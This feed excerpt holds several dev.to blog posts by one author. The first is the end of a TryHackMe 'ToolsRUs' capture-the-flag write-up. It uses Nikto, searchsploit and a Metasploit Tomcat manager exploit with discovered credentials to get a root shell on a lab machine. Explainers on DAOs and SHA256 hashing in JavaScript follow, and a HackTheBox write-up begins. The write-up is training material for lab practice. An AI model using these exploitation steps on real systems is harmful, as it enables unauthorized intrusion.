&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fn62ub6e8goebfkgrq8tv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fn62ub6e8goebfkgrq8tv.png" alt="Hydra BruteForcing"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When we log in through the basic authentication, however, we find this new message, probably pointing to the other open port we found before.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Feamzw7w4cwjy9iyutgef.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Feamzw7w4cwjy9iyutgef.png" alt="Rabbit Hole"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The next questions refer to something we found out about earlier in our Information Gathering phase:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;What other port that serves a web service is open on the machine?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;1234&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Going to the service running on that port, what is the name and version of the software?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Apache Tomcat/7.0.88&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;Running a Nikto scan with &lt;code&gt;nikto -h http://10.10.64.71:1234&lt;/code&gt;, we retrieve more useful information.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fg874kjd9wghyxy2194vt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fg874kjd9wghyxy2194vt.png" alt="Nikto Scan"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;How many documentation files did Nikto identify?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;5&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;Going back to our default 404 page, we find the information needed to answer the following question:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;What is the server version (run the scan against port 80)?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Apache/2.4.18&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;Now, accessing http://:1234/manager/html and logging in with bob's credentials, we get to this admin page.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F0nmdov7o5qb68x453mv2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F0nmdov7o5qb68x453mv2.png" alt="Apache Admin"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Our Nikto scan also gave us information on Apache-Coyote, answering the next question.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;What version of Apache-Coyote is this service using?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;1.1&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;Considering we are dealing with a Tomcat Manager, let's look for it on searchsploit with a simple &lt;code&gt;searchsploit tomcat manager&lt;/code&gt; command.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Ftzc50myv1t37rii4h0iz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Ftzc50myv1t37rii4h0iz.png" alt="Searchsploit"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With all the information we gathered during this process, we are able to try to exploit the application. The first tool we are going for here is Metasploit, for two reasons. The first is that it's a very good and versatile application; the second is that, with searchsploit, we found that the exploit available on our system for this particular application is a .rb file, and since Metasploit is a Ruby-based application, it is most likely a Metasploit-ready module.&lt;/p&gt;

&lt;p&gt;Digging into Metasploit, we find the same exploit we saw before on searchsploit. With that, we can set the RHOSTS to  and the RPORT to 1234, as well as the HttpPassword to bubbles and the HttpUsername to bob.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Frk9wsx2fmlkf4274xd0y.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Frk9wsx2fmlkf4274xd0y.png" alt="Metasploit"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;set RPORT 1234&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;set RHOSTS &amp;lt;IP&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;set HttpPassword bubbles&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;set HttpUsername bob&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;set LHOST &amp;lt;VPN IP&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fz9xl3wto39by4cd6zt88.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fz9xl3wto39by4cd6zt88.png" alt="Metasploit settings"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;(If you don't want to exploit it using Metasploit, there are some alternatives &lt;a href="https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager" rel="noopener noreferrer"&gt;here&lt;/a&gt;.)&lt;/p&gt;

&lt;p&gt;Once everything is configured, we can simply run the exploit with the command &lt;code&gt;run&lt;/code&gt; (or &lt;code&gt;exploit&lt;/code&gt;).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F2di1i3tbaailw0h47yw9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F2di1i3tbaailw0h47yw9.png" alt="Metasploit Shell"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And then we have a shell! Running a &lt;code&gt;getuid&lt;/code&gt; command, we learn that we are running as root! Awesome!&lt;br&gt;
After browsing to the root folder, we find the flag and read it! &lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Ftb9prft1n9457nz2tqpa.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Ftb9prft1n9457nz2tqpa.png" alt="Flag!"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And that's it! We managed to root the ToolsRUs machine, quite a useful way to learn about the various tools and techniques used to exploit an application! Kudos to TryHackMe for creating such a cool room for us to practice and sharpen our skills!&lt;/p&gt;

&lt;p&gt;One takeaway from this particular room is the importance of a good information gathering phase. Most of the tools it highlights are related to this phase, which is - arguably - the most important step in the pentest methodology. It's also good to have a nice plan B. As I also suggested, going for an alternative exploit that does not entirely depend on Metasploit is a good plan B, because sometimes Meterpreter breaks or fails (or you just forgot to configure one of the important fields [like myself, not updating LHOST and hitting my face against the wall multiple times]).&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>hacking</category>
      <category>tryhackme</category>
      <category>metasploit</category>
    </item>
    <item>
      <title>The Power of DAOs</title>
      <dc:creator>Artur Serra</dc:creator>
      <pubDate>Mon, 27 Jul 2020 18:17:15 +0000</pubDate>
      <link>https://dev.to/arturserra/the-power-of-daos-26f2</link>
      <guid>https://dev.to/arturserra/the-power-of-daos-26f2</guid>
      <description>&lt;h1&gt;Introduction&lt;/h1&gt;

&lt;p&gt;&lt;strong&gt;Imagine a new way of doing business inside an organization, with computers and code implementing the rules instead of managers, in a fully decentralized way and using the technical advantages of blockchain, like lower costs and much more speed in implementing governance. That's what DAOs are able to do, but the best way to understand them is to first understand what each word in "Decentralized Autonomous Organization" means.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Let's start with &lt;strong&gt;"Organization"&lt;/strong&gt;. Traditional organizations are a collective of people willing to do something together in order to fulfill a common goal. It can be a non-profit focused on charity, it can be a company willing to revolutionize the market... when a group of people gathers under a banner in order to pursue an objective, it can be called an organization. There is a caveat here: in DAOs, and in blockchain technology in general, there is no difference between people and machines. This equality is brought by the smart contracts, the code that provides the rules inside a DAO: if you are able to meet the requirements in the code, you can participate in the whole governance model provided by the DAO. &lt;br&gt;
Then we have &lt;strong&gt;"Autonomous"&lt;/strong&gt;. As we just saw in the last paragraph, all the rules in a DAO are provided by the smart contracts. Those pieces of code are self-executing, which makes the organization self-governed as well. Once the rules are written, they will have their requirements. Any time a user - it might be a person or a machine - fulfills those requirements, the code will move to the next step, as it was originally programmed to. If it's not in the code, it doesn't exist. This is also the core of all of a DAO's advantages and disadvantages, as we'll discuss in a bit more detail later.&lt;br&gt;
And, finally, we have &lt;strong&gt;"Decentralized"&lt;/strong&gt;. The whole code that rules the organization is distributed. It doesn't fall under the control of a single entity, it's not governed by any single authority or government, and it doesn't have a single physical address. This model, backed by blockchain technology, is one of a DAO's most important features: it allows the organization to be global from the very first moment, and it allows members from all over the world, with no discrimination whatsoever, to have a voice in the decisions.&lt;br&gt;
The world created by the existence of DAOs is fully based on innovation. First off, it leads to a new monetary paradigm, with decentralized, fully autonomous and trustworthy banks and governance models. It also creates a whole new model of products, built on top of blockchains and smart contracts, with their own tokens and cryptocurrencies, and with their agents' identities protected by cryptography. Considering the current paradigm, with data theft and the abdication of any privacy we might have online, this new model leads to a safer way to conduct business, commerce and governance, in a private yet transparent and inclusive way. &lt;/p&gt;

&lt;h1&gt;DAO's advantages...&lt;/h1&gt;

&lt;p&gt;&lt;strong&gt;As already mentioned before, DAOs are an innovative and open model of creating organizations, which is by itself a really good reason to implement them. But let's take a deeper dive into the details of what makes the DAOs so powerful.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The governance tokens given to the members are a way to control the governance inside the DAO. Let's work with an example here: a member of the DAO submits a proposal for voting. Each member who holds a token gets the right to vote according to the number of tokens they have (it can vary depending on the case), but each vote will have its anonymity and privacy assured. This way, the members are free to vote democratically on the proposals, and those decisions will be protected by the smart contracts. No bribery or corruption can take place in such a scenario, and even blackmail under pressure will be avoided. With no central power, it's impossible to influence the governance inside the organization without influencing the majority of its members. &lt;br&gt;
Smart contracts, the leading force behind the curtains, store the rules and processes in code. This automated way is safer than leaving all the management to people. Let's say a company wants to cover an employee's travel expenses. A contract can be created to deliver the money to that employee, instantly. The whole transaction is transparent and auditable, which means it's really easy for everyone to check how much money was taken from that contract. Even salaries can be paid in this automated way, and a job position that offers X dollars/month will deliver that amount in an indiscriminate way, agnostic to beliefs, race or gender. The equality, transparency and precision that smart contracts bring into the DAO game are unique, and the praise they get is justified.&lt;br&gt;
This openness and transparency can be observed in the whole structure of a DAO. When multiple parties have no previous reason to trust each other - or when they don't even know each other - the smart contracts ensure a way to coordinate resources in a trustworthy and auditable way. Governance inside a DAO is geography-agnostic and censorship-resistant, meaning one can vote on the proposals wherever they are, on a platform that isn't as easily censored as apps and websites that rely on a single IP address. It also rewards contribution, meaning that one can be rewarded once the DAO succeeds, and the more money it gets, the more the contributor will profit from the early-stage investments they made. &lt;/p&gt;

&lt;h1&gt;...and disadvantages.&lt;/h1&gt;

&lt;p&gt;&lt;strong&gt;But not everything in a DAO is a dream come true. As Uncle Ben once said, "with great power comes great responsibility". Open-source code can make information gathering easier for hackers, and it also exposes the organization's business plan.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;With your source code out there in the open, it's easy for any malicious agent to find it and try to exploit it. The famous case of The DAO Hack, where millions of dollars were transferred by using a bug in the original The DAO smart contracts, really created an impact, forcing Ethereum to be hard forked into Ethereum and Ethereum Classic. For that reason, investments in application security, testing and threat hunting are necessary, because DAOs are usually connected to a huge number of stakeholders, and also to these stakeholders' money. The code must be really impeccable and adamant before the implementation, since blockchain technology doesn't allow edits or deletions, only appends: once the smart contract is in the blockchain, it's there forever. &lt;br&gt;
Another "problem" with the transparency provided by the open-source nature of DAOs is that your business plan will also be out there for everyone to see and even copy. While many companies up to this day were created based on the secrecy of their plans, this new implementation might be a new paradigm shift in how companies create their businesses. Based on what we can observe from crypto business models, having an open-source business plan is not necessarily a drawback. Most of those business models are based on a virtuous cycle, a network effect that spirals upwards from the moment the company is created.&lt;br&gt;
It happens because of the uniqueness of this model in the corporate world. Let's say you create your DAO with your unique business plan. It allows day-one investments from all over the world, because the cryptocurrency is the same everywhere and it doesn't rely on banks or country regulations. Someone from across the globe can fund your company minutes after it was deployed on the chain. This way, the number of users and the adoption rise constantly, and that provides a stronger network based on your DAO. It is simple: the more the risk around your model decreases, the more its defensibility rises, making your company way more trustworthy.&lt;br&gt;
Now let's say someone observes how well your company is doing and decides to do exactly the same. They go there, copy your code, and start their business all over again. They will have a whole new network, without as many users and adoption - and, consequently, less risk - as yours. A newcomer, having to decide between a well-established network and a completely new network, will most likely go for the well-established one, especially when their money is at stake. If your DAO proved to be successful and reliable over time, then you'd have no problem whatsoever attracting new users.&lt;/p&gt;

&lt;h1&gt;How will DAOs shape the future (and the present!)&lt;/h1&gt;

&lt;p&gt;&lt;strong&gt;An educational organization open for everyone in the world, independent and self-governing? A charity institution free from corruption and funding projects chosen democratically? All these scenarios are possible with DAOs.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Now that you have the gist of how a DAO works, the possibilities in this field are enormous. They can restructure the future, so we can abandon the centralized, trust-dependent model we are based on right now. Let's do an exercise and imagine what problems we can tackle with this new model.&lt;br&gt;
Think about Kickstarter, or any other crowdfunding platform. They usually function like this: someone goes there and posts a project, its goals and how people can contribute to it. Once the project is funded, all the money goes to the creator of the project, and people must trust that they will use that money correctly. This dependency on trust might be harmful, but smart contracts can ensure it is fulfilled with a few lines of code. How would it work? Imagine that, instead of transferring the money to the creator of the project, it transfers it to a pooled investment fund. Then, every time the manager or the creator wants to use some of that money to buy something, they should submit a proposal, to be voted on by each member in that pool. Only if it's successfully voted on and accepted could the money be transferred to the manager/creator or directly to some other crypto wallet, and the project could advance. This way it would be easier to track the transfers and expenses, and everyone would have a voice in voting on where the money would go.&lt;br&gt;
Now let's think about a university or school. A lot of what happens there is directly influenced by a rector, or even a government, most of the money comes from investments from shady sources demanding biased research, and no information is truly free. In Brazil, for example, we are dealing with problems like this right now, with the government allocating money meant to be used in research and education somewhere else. In a DAO model, the decisions on where the money would be invested would depend on the teachers and students, and they would vote on where they would like to see that money go. This is a way to promote a free, unbiased development of information and allocation of money.&lt;br&gt;
In general, DAOs are still growing and there is space out there for all sorts of new ideas. MakerDAO, for example, is leading this movement, and they are also responsible for DAI, a top stablecoin. Aragon, on the other hand, is facilitating people's adoption of this new model, and you can create a simple DAO in minutes using their boilerplate code. The possibilities are enormous, and the time is right: we just need to educate ourselves better about it to start creating our way into this new paradigm.&lt;/p&gt;

</description>
      <category>blockchain</category>
      <category>crypto</category>
      <category>ethereum</category>
      <category>smartcontract</category>
    </item>
    <item>
      <title>Understanding SHA256</title>
      <dc:creator>Artur Serra</dc:creator>
      <pubDate>Wed, 08 Jul 2020 05:00:00 +0000</pubDate>
      <link>https://dev.to/arturserra/understanding-sha256-3f08</link>
      <guid>https://dev.to/arturserra/understanding-sha256-3f08</guid>
      <description>&lt;p&gt;As I dive deeper into my studies related to blockchain and blockchain development, I find some intriguing core concepts that shine a light on the inner intricacies of how blockchains work.&lt;/p&gt;

&lt;p&gt;One of these concepts, vital to blockchain functionality, is called SHA256. It is a Secure Hash Algorithm, commonly used for digital signatures and authentication. But before we try to get a better grasp of it, let's understand what a hash algorithm is.&lt;/p&gt;

&lt;p&gt;Let's say you want to transfer some data from one point to another, and you need this data to be secure and easily verifiable. By using a hash algorithm, you are going to crush down that big chunk of data into a single line - a hexadecimal value that summarizes what is contained in that file.&lt;/p&gt;

&lt;p&gt;To illustrate that, let's use this awesome website called &lt;a href="https://andersbrownworth.com/blockchain/hash"&gt;AndersBrownworth.com&lt;/a&gt;. They have a tab focused on Hashing, and we can go there and play with any values inside the Data box, and we can observe how the hash value is going to change. For this example, I'm going to use a short story from Hans Christian Andersen that I really like: The Little Match Girl. &lt;/p&gt;

&lt;p&gt;The original short story has 5456 characters, but when it's hashed down, it will be represented by a 64-character string.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--0uny_z-U--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/nf3b3lyo83vqhoalrjqo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--0uny_z-U--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/nf3b3lyo83vqhoalrjqo.png" alt="Short story example"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It is important to note that, no matter how many characters you pass through a hashing algorithm, you will always get a string with the same number of characters as a result. Even if we write a simple "Hello there" in the data box, it will return a 64-character string to us.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--YcSngLgg--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/3adafj9t22i7blo1mrci.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--YcSngLgg--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/3adafj9t22i7blo1mrci.png" alt="Hello there example"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This hexadecimal value appears to be random, but it isn't. As said before, it depends on the original value, so even if we make small changes in the text, it will return a different value. For example, the hash value for our saddening short story is &lt;strong&gt;5548efc1d8e6a691a730a042e3f32b26e163ce9ba050116edc2af3b2705f49cb&lt;/strong&gt;. That combination of 5456 characters in that same order will always return this value. But if we add an "A" to the beginning of the text, we will get a different result: &lt;strong&gt;9ad55f658a3636ca079a0fe74b5a06a914977ba15b4db7f012ae2e47c8d1417b&lt;/strong&gt;.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--sNm7NBi---/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/e3d22wo8ichm7u6sb97c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--sNm7NBi---/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/e3d22wo8ichm7u6sb97c.png" alt="Extra A example"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Even if we remove the extra "A" we added, going back to the original text, and then swap a semicolon for a regular comma, we still get a different result: &lt;strong&gt;2de2316e5e5f9e10ee899a7f42dc51a19f7fd9a219dae672ada1a80f5c74134a&lt;/strong&gt;. This shows how powerful SHA256 is, especially for digital signatures.&lt;/p&gt;

&lt;p&gt;This &lt;em&gt;Avalanche Effect&lt;/em&gt;, where changing a letter, a punctuation mark or even a single byte in the original file completely modifies the hash output, is one of the three requirements of a hashing function. The other two are &lt;em&gt;Speed&lt;/em&gt;, which is also fairly good in SHA256, because it strikes a balance between fast enough - so it will improve its adoption - and slow enough - so it's not easy to crack - and &lt;em&gt;Collision Resistance&lt;/em&gt;, which means two different inputs should not produce the same output. Due to its calculations it's almost impossible to naturally create the same output from two different inputs, but if someone can manipulate the function to artificially create a collision, it could result in a security break.&lt;/p&gt;

&lt;p&gt;Summarizing, the process goes like this:&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--zgJ7vzT0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/13qlmtty7w2f4vqkcakn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--zgJ7vzT0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/13qlmtty7w2f4vqkcakn.png" alt="Hashing Process"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And how is it used in the various blockchains out there? With the hashing function, it is possible to create a different hash for each block in the blockchain. The reason for this is to provide a unique identifier for every block, allowing us to reference a block by its "digital fingerprint", the hash. It also allows the connection between two blocks, creating a chain, which I am going to explain in a future text.&lt;/p&gt;

&lt;p&gt;Now, to implement a basic usage of SHA256 with JavaScript, let's install an npm package called &lt;a href="https://www.npmjs.com/package/crypto-js"&gt;CryptoJS&lt;/a&gt;. Its installation is quite simple, you just need to run&lt;/p&gt;

&lt;p&gt;&lt;code&gt;npm install crypto-js&lt;/code&gt; &lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--l5gjExQi--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/a7ctsbis5sfhzfet5oy4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--l5gjExQi--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/a7ctsbis5sfhzfet5oy4.png" alt="Installing CryptoJS"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Once it's done, create a JavaScript file in the same folder you installed CryptoJS and open it. &lt;/p&gt;

&lt;p&gt;Now we are going to import the CryptoJS package using:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;const CryptoJS = require("crypto-js");&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Then, we just need to call this function we just imported, using:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;let hash = CryptoJS.SHA256("Message")&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;This step will create a WordArray based on the message input. So let's take that result and add a call that encodes the WordArray into a hexadecimal string:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;let hashHex = hash.toString(CryptoJS.enc.Hex)&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;And then, to log it to our terminal, we'll use a regular console.log:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;console.log(hashHex)&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;In the end, the code will look more or less like this:&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--dgjC8Zff--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/40k2gkqs34im7b9ew4cw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--dgjC8Zff--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/40k2gkqs34im7b9ew4cw.png" alt="Full Code SHA256"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, time to test it. By running &lt;code&gt;node sha256.js&lt;/code&gt;, we get the result in the terminal.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--GTL3mdg5--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/u2celjj40og3zyqnz90o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--GTL3mdg5--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/u2celjj40og3zyqnz90o.png" alt="SHA256 Terminal"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We got a hexadecimal value &lt;strong&gt;ba7c7bc89cad8d2b8c024ab063493af7d2e310277c64e6d9cfa822deca852152&lt;/strong&gt;.&lt;br&gt;
If we go back to our hashing companion &lt;a href="https://andersbrownworth.com/blockchain/hash"&gt;AndersBrownworth.com&lt;/a&gt; and write the same input, we get the same result! Nice, it worked! (:&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--bFgn62bl--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/ldcrnikt52xylyxqwnyb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--bFgn62bl--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/ldcrnikt52xylyxqwnyb.png" alt="Hash SHA256 test"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With this we conclude our first approach to SHA256, understanding how it works, why it's used in blockchain technologies and how to easily implement it with JavaScript.&lt;br&gt;
If you want to keep studying this subject, I'll leave down below some links that might be useful to kickstart your research! Keep coding!&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;em&gt;&lt;a href="https://www.youtube.com/watch?v=b4b8ktEV4Bg"&gt;Hashing Algorithms and Security - Computerphile&lt;/a&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;a href="https://www.youtube.com/watch?v=DMtFhACPnTY"&gt;SHA: Secure Hashing Algorithm - Computerphile&lt;/a&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;a href="https://medium.com/shokone/hash-no-not-that-kind-the-crypto-kind-2e8bf616aa24"&gt;The Evolution of the Cryptographic Hash Function in Blockchains&lt;/a&gt;&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>blockchain</category>
      <category>cryptography</category>
      <category>security</category>
    </item>
    <item>
      <title>HackTheBox Write-Ups - Lame</title>
      <dc:creator>Artur Serra</dc:creator>
      <pubDate>Thu, 02 Jul 2020 05:23:25 +0000</pubDate>
      <link>https://dev.to/arturserra/hackthebox-write-ups-lame-49c</link>
      <guid>https://dev.to/arturserra/hackthebox-write-ups-lame-49c</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--jw1XfhC8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/6ojnxkyuwnnf1h97ew32.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--jw1XfhC8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/6ojnxkyuwnnf1h97ew32.png" alt="Lame Info Card"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Lame is, by no means, a difficult box. It also figures as the first Linux Machine from &lt;a href="https://docs.google.com/spreadsheets/u/1/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/htmlview#"&gt;TJ_Null's OSCP-Like VM's list&lt;/a&gt;, so it's a nice place to start. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&amp;gt; Phase One - Information Gathering&lt;/strong&gt;&lt;/p&gt;

